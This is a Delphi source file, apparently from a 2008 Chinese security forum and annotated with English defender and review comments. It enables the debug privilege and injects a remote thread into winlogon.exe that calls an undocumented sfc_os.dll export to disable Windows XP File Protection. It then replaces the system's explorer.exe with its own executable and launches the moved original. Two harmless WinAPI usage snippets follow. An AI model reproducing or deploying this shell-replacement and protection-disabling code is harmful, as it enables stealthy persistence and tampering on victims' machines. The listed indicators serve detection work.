
📄 复件 关闭xp保护替换explorer.txt

📁 关闭 Windows 文件保护(WFP),值得一看:作者思路不错,引用了未公开函数

{*******************************************************}
{                                                       }
{       关闭XP保护。替换explorer.exe                    }
{                                                       }
{       版权所有 (C) 2008 bbs.secdst.net                }
{                                                       }
{*******************************************************}

program Project1;
uses
    Windows,TlHelp32;
function LowerCase(const S: string): string;  // ASCII-only lower-casing
var
  Idx: Integer;
  Cur: Char;
begin
  // Returns a copy of S in which 'A'..'Z' are folded to 'a'..'z'.
  // Every other character is copied through unchanged.
  SetLength(Result, Length(S));
  for Idx := 1 to Length(S) do
  begin
    Cur := S[Idx];
    if (Cur >= 'A') and (Cur <= 'Z') then
      Cur := Chr(Ord(Cur) + 32);   // 'a' - 'A' = 32
    Result[Idx] := Cur;
  end;
end;
// Single-instance check built on a named mutex.
// Returns False only when CreateMutex hands back a handle AND reports
// ERROR_ALREADY_EXISTS (another holder of MutexName is present). Returns True
// in every other case, including when CreateMutex itself fails and returns 0.
// The handle is never closed, so the mutex stays alive until the process exits.
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
  hMutex: dword;
begin
  hMutex := CreateMutex(nil, True, MutexName);
  // GetLastError is consulted only when a handle was returned.
  Result := not ((hMutex <> 0) and (GetLastError = ERROR_ALREADY_EXISTS));
end;
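// Returns the Windows directory with a trailing backslash, or '' when the
// directory cannot be obtained.
function GetWinPath: string;
var
   Buf: array[0..MAX_PATH] of char;
   Len: UINT;
begin
  Result := '';
  // GetWindowsDirectory returns the number of characters written, 0 on failure,
  // or the required size when the buffer is too small. In the last two cases
  // Buf was not filled in, so it must not be read (the original read it
  // unconditionally and then indexed Result[0] on an empty string).
  Len := GetWindowsDirectory(Buf, MAX_PATH);
  if (Len = 0) or (Len >= MAX_PATH) then Exit;
  SetString(Result, Buf, Len);
  if Result[Length(Result)]<>'\' then Result := Result + '\';
end;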
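// Returns the current user's temporary directory with a trailing backslash,
// or '' when the path cannot be obtained.
function GetTempDirectory: string;
var
   Buf: array[0..MAX_PATH] of char;
   Len: DWORD;
begin
  Result := '';
  // GetTempPath returns the number of characters written, 0 on failure, or a
  // value larger than the size passed in when the buffer is too small. Buf is
  // only read when the call actually filled it.
  Len := GetTempPath(MAX_PATH,Buf);
  if (Len = 0) or (Len >= MAX_PATH) then Exit;
  SetString(Result, Buf, Len);
  if Result[Length(Result)]<>'\' then Result := Result + '\';
end;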

// Tries to enable SeDebugPrivilege in the current process token and returns
// the result of AdjustTokenPrivileges (False if the privilege name cannot be
// looked up).
//
// Why it matters for defenders: with SeDebugPrivilege enabled, a process can
// open handles to processes it does not own, which is what the later
// OpenProcess call on winlogon.exe depends on. The privilege is normally held
// only by administrators, so this program is presumably meant to run from an
// administrative account. A non-debugger binary enabling it is a useful
// signal in privilege-use auditing.
//
// NOTE(review): the OpenProcessToken result is not checked and hToken is never
// closed. AdjustTokenPrivileges can also report success when the privilege was
// not actually assigned (GetLastError = ERROR_NOT_ALL_ASSIGNED), so a True
// result here does not prove the privilege is enabled.
function EnableDebugPriv : Boolean;      // enable the debug privilege
var
  hToken : THANDLE;
  tp : TTokenPrivileges;
  rl : Cardinal;
begin
  result := false;
  // Open our own token with the rights needed to change privileges.
  OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
  // Resolve the privilege name to its LUID on the local system.
  if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
  begin
    tp.PrivilegeCount := 1;
    tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
  end;
end;
// Starts a thread in the process behind ProcessHandle whose entry point is
// export ordinal 2 of sfc_os.dll, then waits up to 4000 ms for it.
// According to the original comment, the target is winlogon.exe and the goal
// is to switch off Windows XP file protection (WFP).
//
// Ordinal 2 is resolved by number, not by name; it is not a documented API,
// and what it does cannot be confirmed from this listing alone.
//
// Defender notes:
//  - The observable behaviour is a remote thread created in winlogon.exe by an
//    unrelated user-mode process. Remote-thread and process-access telemetry
//    records this; it is rarely legitimate.
//  - WFP is the file-protection mechanism of the XP generation; later Windows
//    versions protect system files differently, so this listing is presumably
//    specific to that generation.
//  - With WFP off, replaced system binaries are no longer restored
//    automatically; integrity has to be checked by hash or signature.
//
// NOTE(review): no return value is checked, and hThread (declared as HMODULE
// but holding a thread handle) is never closed.
procedure InjectThread(ProcessHandle: DWORD);     // run the WFP-disabling export inside winlogon.exe
var
   TID: LongWord;
   hSfc,hThread: HMODULE;
   pfnCloseEvents: Pointer;
begin
  hSfc := LoadLibrary('sfc_os.dll');
  pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
  // The local copy of the DLL is released before the address is used; the
  // address is only ever executed in the remote process.
  FreeLibrary(hSfc);
  hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
  WaitForSingleObject(hThread, 4000);
end;
// Walks a Toolhelp process snapshot and, for the first process whose image
// name matches Name, opens it with PROCESS_ALL_ACCESS, hands the handle to
// InjectThread and closes it again.
//
// Only the snapshot side of the comparison is lower-cased, so Name must
// already be lower case (the one visible caller passes 'winlogon.exe').
//
// Defender notes: a full-access handle to winlogon.exe requested by an
// ordinary user-mode program is a strong signal in process-access telemetry.
// It needs the debug privilege enabled earlier in this program.
//
// NOTE(review): the OpenProcess result is not checked before it is passed on.
procedure InitProcess(Name: string);     // find the winlogon.exe process by name
var
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  ProcessHandle:dword;
begin
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  // dwSize is set before Process32First is called.
  FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
  if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
    If Name = LowerCase(FProcessEntry32.szExeFile) then
    begin
      ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
      InjectThread(ProcessHandle);
      CloseHandle(ProcessHandle);
      Break;   // only the first match is used
    end;
until not  Process32Next(FSnapshotHandle,FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;
// Program entry point. Sequence as written:
//   1. single-instance check on the named mutex 'OpenSoul';
//   2. enable the debug privilege, exit if that fails;
//   3. run the WFP-disabling thread inside winlogon.exe;
//   4. move <windir>\explorer.exe to <windir>\system32\explorer.exe and copy
//      this executable to <windir>\explorer.exe;
//   5. start the moved original from system32.
//
// Host indicators visible in this listing (for triage and detection):
//   - a mutex named 'OpenSoul';
//   - an explorer.exe image in <windir>\system32. The genuine shell is
//     expected in <windir>, as this code itself assumes, so a process running
//     from the system32 path is anomalous;
//   - <windir>\explorer.exe whose hash or signature no longer matches the
//     vendor's file.
//
// NOTE(review): as written, the `if` below governs only the showmessage call.
// The begin..end block after it is a separate statement, so it is not
// conditional on the path comparison.
const ExpFile = 'explorer.exe';
      MasterMutex = 'OpenSoul';
var
  s: string;
begin
  if not CreatedMutexEx(MasterMutex) then ExitProcess(0); // single-instance mutex
  if  not EnableDebugPriv then Exit;     // exit if the privilege could not be enabled
  InitProcess('winlogon.exe') ;                  // inject into winlogon.exe: file protection is turned off first so the system does not restore the file
  s := ParamStr(0) ;                     // full path and name of the running program
  if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then     // is this process the explorer.exe in the Windows directory?
showmessage('目前的explorer.exe不是自己');
  begin                                    // if it is not
  MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING);  // first move the explorer.exe that is currently in place
  CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;  // copy this program into the Windows directory as explorer.exe
  end;
  WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1);     // start the original explorer.exe
end.












WinAPI: GetWindowsDirectory - 获取 Windows 所在目录 
//声明:
GetWindowsDirectory(
  lpBuffer: PChar; {缓冲区}
  uSize: UINT      {缓冲区大小}
): UINT;           {返回实际长度}
--------------------------------------------------------------------------------

//举例:
var
  arr: array[0..MAX_PATH] of Char;
  num: UINT;
begin
  // arr holds MAX_PATH + 1 characters, so a size of MAX_PATH leaves room for
  // the terminator.
  // The return value is only displayed here, not checked. 0 means the call
  // failed, and a value larger than the size passed in means the buffer was
  // too small. In both cases arr was not filled and should not be read.
  num := GetWindowsDirectory(arr, MAX_PATH);
  ShowMessage(arr);           {C:\WINDOWS}
  ShowMessage(IntToStr(num)); {10}
end;



WinAPI: GetTempPath - 获取临时文件夹路径 
//声明:
GetTempPath(
  nBufferLength: DWORD; {缓冲区大小}
  lpBuffer: PChar       {缓冲区}
): DWORD;               {返回实际长度}
--------------------------------------------------------------------------------

//举例:
var
  arr: array[0..MAX_PATH] of Char;
  num: DWORD;
begin
  // Note the argument order: size first, buffer second. This is the reverse
  // of the GetWindowsDirectory declaration shown on this page.
  // The return value is only displayed here, not checked. 0 means the call
  // failed, and a value larger than the size passed in means the buffer was
  // too small. In both cases arr should not be read.
  num := GetTempPath(MAX_PATH, arr);
  ShowMessage(arr);           {C:\DOCUME~1\wy\LOCALS~1\Temp\}
  ShowMessage(IntToStr(num)); {29}
end;









